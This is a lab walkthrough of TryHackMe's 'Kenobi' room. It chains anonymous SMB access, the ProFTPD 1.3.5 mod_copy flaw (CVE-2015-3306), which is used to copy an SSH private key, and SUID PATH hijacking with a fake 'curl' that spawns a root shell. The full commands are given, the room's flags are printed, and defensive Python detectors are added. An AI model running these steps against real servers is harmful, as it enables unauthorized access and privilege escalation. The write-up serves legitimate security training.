THM Kenobi Walkthrough — Samba Shares, ProFTPD, and Path Exploitation
A complete walkthrough of TryHackMe's "Kenobi" room — exploiting Samba shares, ProFTPD 1.3.5, and abusing path variables for privilege escalation.
Introduction
Kenobi is a TryHackMe room released in 2021 that walks through a classic Linux exploitation chain: enumerate SMB shares, use an FTP vulnerability to read private files, and leverage a misconfigured binary to escalate privileges via path hijacking.
What makes Kenobi a good learning box is that it connects three distinct techniques into a single chain — you need all three to get root. It's easy, but it's not handed to you. You have to connect the dots.
"Kenobi teaches one thing better than most boxes: chaining. A single vulnerability gets you a foothold. Connecting multiple weaknesses is how you get root."
Machine Info
- Platform: TryHackMe
- Room: Kenobi
- OS: Linux (Ubuntu)
- Difficulty: Easy
- Released: 2021
- Target IP: 10.10.19.233 (varies per session)
Step 1: Enumeration
Start with nmap:
nmap -sC -sV -oN kenobi.nmap 10.10.19.233
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu
Four services: FTP on 21, SSH on 22, HTTP on 80, SMB on 139/445.
SMB Enumeration
Let's enumerate the Samba shares:
smbclient -L //10.10.19.233 -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk (empty)
IPC$ IPC IPC Service (kenobi server (Samba 4.3.11-Ubuntu))
There's an anonymous share accessible without credentials:
smbclient //10.10.19.233/anonymous -N
smb: \> ls
. D 0 Tue Apr 20 13:26:10 2021
.. D 0 Tue Apr 20 12:20:56 2021
log.txt N 12237 Tue Apr 20 13:26:10 2021
smb: \> get log.txt
Download and read log.txt:
cat log.txt
Generating key for rsa
...
# Information about the FTP server and Samba configuration
The log file contains FTP server information and mentions a user kenobi. It references the ProFTPD server running on port 21.
Step 2: ProFTPD Exploitation (CVE-2015-3306)
ProFTPD 1.3.5 has a known vulnerability — the mod_copy module allows copying files without authentication via the SITE CPFR and SITE CPTO commands:
# Connect to FTP
nc 10.10.19.233 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation)
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination destination
SITE CPTO /var/tmp/id_rsa
250 Copy successful
This copies Kenobi's private SSH key to /var/tmp/id_rsa, which we can access through the Samba share.
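As an added, defender-side example that is not part of the original walkthrough: a small Python analyzer for an FTP control-channel transcript. It tracks whether the session has seen a 230 login reply and flags any SITE CPFR/CPTO issued before that point (the pre-authentication copy that CVE-2015-3306 permits), and separately flags copies that touch sensitive paths such as .ssh or id_rsa. The "C:"/"S:" line prefixes and the transcript itself are constructed for this example and modelled on the exchange above; they are not a real capture or a real ProFTPD log format.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed transcript: client lines are prefixed "C:", server lines "S:".
# The first four lines mirror the walkthrough's exchange; the rest is sample data.
SAMPLE_TRANSCRIPT = """\
S: 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation)
C: SITE CPFR /home/kenobi/.ssh/id_rsa
S: 350 File or directory exists, ready for destination destination
C: SITE CPTO /var/tmp/id_rsa
S: 250 Copy successful
C: USER kenobi
S: 331 Password required for kenobi
C: PASS hunter2
S: 230 User kenobi logged in
C: SITE CPFR /home/kenobi/notes.txt
S: 350 File or directory exists, ready for destination destination
C: SITE CPTO /home/kenobi/notes.bak
S: 250 Copy successful
"""

# Path components that should never be the source or target of an FTP-side copy.
SENSITIVE = re.compile(r"(^|/)(\.ssh|shadow|id_rsa|id_ed25519|\.bash_history)(/|$)")
SITE_COPY = re.compile(r"SITE\s+(CPFR|CPTO)\s+(\S+)", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int        # 1-based line in the transcript
    command: str        # "CPFR" or "CPTO"
    path: str           # argument given to the command
    authenticated: bool # had the server already sent a 230 reply?
    sensitive: bool     # does the path match SENSITIVE?


def analyze_ftp_transcript(text: str) -> List[Finding]:
    """Return every SITE CPFR/CPTO seen, annotated with the session's auth state."""
    findings = []
    authenticated = False
    for n, raw in enumerate(text.splitlines(), 1):
        if raw[:2] not in ("C:", "S:"):
            continue  # ignore anything that is not a tagged control-channel line
        side, line = raw[:2], raw[2:].strip()
        if side == "S:":
            if line.startswith("230"):    # login succeeded
                authenticated = True
            elif line.startswith("221"):  # server closed the session
                authenticated = False
            continue
        m = SITE_COPY.match(line)
        if m:
            path = m.group(2)
            findings.append(Finding(n, m.group(1).upper(), path,
                                    authenticated, bool(SENSITIVE.search(path))))
    return findings


def alerts(findings: List[Finding]) -> List[Finding]:
    """Copies worth alerting on: issued pre-auth, or touching a sensitive path."""
    return [f for f in findings if not f.authenticated or f.sensitive]


if __name__ == "__main__":
    for f in alerts(analyze_ftp_transcript(SAMPLE_TRANSCRIPT)):
        state = "UNAUTHENTICATED" if not f.authenticated else "authenticated"
        print(f"line {f.line_no}: SITE {f.command} {f.path} ({state}, sensitive={f.sensitive})")
```

On the constructed transcript the two pre-login copies are reported; the two copies made after the 230 reply are kept as findings but not alerted on, which is the behaviour the 1.3.5a fix enforces on the server side. If you feed this real data, the only part that needs adapting is the line tagging.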
Accessing the Key via SMB
# Mount the anonymous share
mkdir /mnt/kenobi
mount -t cifs //10.10.19.233/anonymous /mnt/kenobi
# The copied file should be accessible through the share
ls /mnt/kenobi/
log.txt id_rsa
cat /mnt/kenobi/id_rsa
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----
SSH as Kenobi
chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.19.233
kenobi@kenobi:~$ id
uid=1000(kenobi) gid=1000(kenobi) groups=1000(kenobi)
We're in as kenobi.
User Flag
cat ~/user.txt
6472642b09b4c2441a7d1da23c7cb1c4
Step 3: Privilege Escalation
Now we need to go from kenobi to root. Let's enumerate:
find / -perm -4000 -type f 2>/dev/null
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/at
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkitd
/usr/lib/eject/dmcrypt-get-device
/usr/bin/menu
There's a custom SUID binary: /usr/bin/menu. Let's examine it:
file /usr/bin/menu
/usr/bin/menu: ELF 64-bit LSB executable, x86-64
strings /usr/bin/menu
...
curl -I localhost
uname -r
ifconfig
...
The binary displays a simple menu with three options:
- Status check (curl -I localhost)
- Kernel version (uname -r)
- Interface config (ifconfig)
Critical observation: it calls these commands using their short names (e.g., curl not /usr/bin/curl, uname not /usr/bin/uname). This means it relies on the PATH environment variable to resolve the executables.
Path Hijacking
Because the binary runs as root (SUID), any command it executes runs with root privileges. If we modify PATH to point to a directory we control, we can make it execute our own version of curl, uname, or ifconfig:
# Create a fake "curl" that gives us a shell
echo '/bin/bash' > /tmp/curl
chmod +x /tmp/curl
# Modify PATH to point to our fake binary first
export PATH=/tmp:$PATH
# Run the menu binary and select option 1
/usr/bin/menu
# It runs our fake curl, which spawns a root shell
id
uid=0(root) gid=0(root)
whoami
root
Root Flag
cat /root/root.txt
177f796f89f6007aa1344b6c82b32925
Step 4: Breaking Down the Privesc
The path hijacking technique works because:
- The SUID binary inherits the user's environment (specifically PATH)
- The binary uses relative paths for command execution (no absolute paths like /usr/bin/curl)
- We control PATH and can ensure our malicious binary is found first
This is why the principle of least privilege applies to environment variables too. Any SUID binary that uses relative paths and inherits the user's PATH is vulnerable.
"Setuid binaries that call out to other executables with relative paths are a privilege escalation waiting to happen. Always check strings on SUID binaries for this pattern."
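The audit the quote recommends, as an added Python example that is not part of the original walkthrough: it reproduces the `strings` heuristic (printable runs of four or more bytes), flags embedded command lines whose first token is a bare command name rather than an absolute path, and separately checks a PATH value for entries an unprivileged user could plant a binary in (empty, relative, or world-writable). The sample "binary" is a constructed byte string modelled on what the walkthrough found in /usr/bin/menu, not a real ELF; the list of known command names and the file path passed to audit_suid_binary are assumptions of this example.

```python
import os
import re
import stat
from typing import Callable, List, Tuple

# Commands a menu-style helper is likely to call. If one is the first token of an embedded
# string and has no leading '/', the binary resolves it through PATH at run time.
# (Assumed list for this example; extend it for your environment.)
KNOWN_COMMANDS = {
    "curl", "wget", "uname", "ifconfig", "ip", "id", "cat", "ls", "ps", "netstat", "ss",
    "sh", "bash", "python", "perl", "service", "systemctl", "tar", "gzip", "mount", "df",
}


def extract_strings(blob: bytes, min_len: int = 4) -> List[str]:
    """Printable ASCII runs of at least min_len bytes, the same heuristic `strings` uses."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def relative_command_strings(strings: List[str]) -> List[str]:
    """Embedded command lines whose program name is bare (PATH-resolved), not absolute."""
    hits = []
    for s in strings:
        tokens = s.strip().split()
        if tokens and tokens[0] in KNOWN_COMMANDS:
            hits.append(s.strip())
    return hits


def audit_suid_binary(path: str) -> Tuple[bool, List[str]]:
    """Return (is_setuid, PATH-resolved command strings) for a file on disk."""
    st = os.stat(path)
    with open(path, "rb") as f:
        hits = relative_command_strings(extract_strings(f.read()))
    return bool(st.st_mode & stat.S_ISUID), hits


def _world_writable(directory: str) -> bool:
    try:
        return bool(os.stat(directory).st_mode & stat.S_IWOTH)
    except OSError:
        return False  # missing directory: nothing to plant into (yet)


def risky_path_entries(path_value: str,
                       is_world_writable: Callable[[str], bool] = _world_writable
                       ) -> List[Tuple[str, str]]:
    """Entries in a PATH value that let an unprivileged user supply the binary found first."""
    risky = []
    for entry in path_value.split(":"):
        if entry == "":
            risky.append((entry, "empty entry means the current directory"))
        elif not entry.startswith("/"):
            risky.append((entry, "relative entry"))
        elif is_world_writable(entry):
            risky.append((entry, "world-writable directory"))
    return risky


# Constructed sample: an ELF-like header followed by strings of the kind the walkthrough
# found in /usr/bin/menu. It is sample data, not a real binary.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"curl -I localhost\x00uname -r\x00ifconfig\x00/usr/bin/id -u\x00"
    + b"***Menu***\x00GLIBC_2.2.5\x00system\x00"
)

if __name__ == "__main__":
    for line in relative_command_strings(extract_strings(SAMPLE_BINARY)):
        print("PATH-resolved command:", line)
    for entry, why in risky_path_entries(os.environ.get("PATH", "")):
        print(f"risky PATH entry {entry!r}: {why}")
    # To audit a real file (path assumed): print(audit_suid_binary("/usr/bin/menu"))
```

Running it on the constructed sample reports curl, uname and ifconfig as PATH-resolved while leaving /usr/bin/id alone, which is the distinction the walkthrough relies on. The PATH check is the complementary control: it is aimed at the environment that privileged processes such as cron jobs and sudo's secure_path actually inherit, since a SUID binary that honours the caller's PATH cannot be saved by any PATH value.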
Summary of Full Exploitation Chain
| Step | Technique | Result |
|------|-----------|--------|
| 1 | SMB enumeration | Found anonymous share with log.txt |
| 2 | ProFTPD mod_copy (CVE-2015-3306) | Copied kenobi's SSH key to accessible location |
| 3 | SMB mount to retrieve the key | Obtained SSH access as kenobi |
| 4 | SUID binary enumeration | Found /usr/bin/menu with relative paths |
| 5 | PATH hijacking | Executed fake binary as root |
Lessons Learned
Kenobi reinforces three important lessons:
- Don't ignore SMB on internal boxes — anonymous shares exist more often than you'd think, and they often contain useful information
- Know your FTP exploits — ProFTPD's mod_copy is a niche but powerful technique when you need to move files between directories without authentication
- strings on SUID binaries reveals paths — the moment you see a SUID binary calling external commands without absolute paths, you've found your privesc
This box is a great example of why Linux privilege escalation isn't always about kernel exploits. Sometimes it's about how a system administrator configured a binary six years ago and forgot about it.
Up next: Back to productivity territory with org-mode for developers.
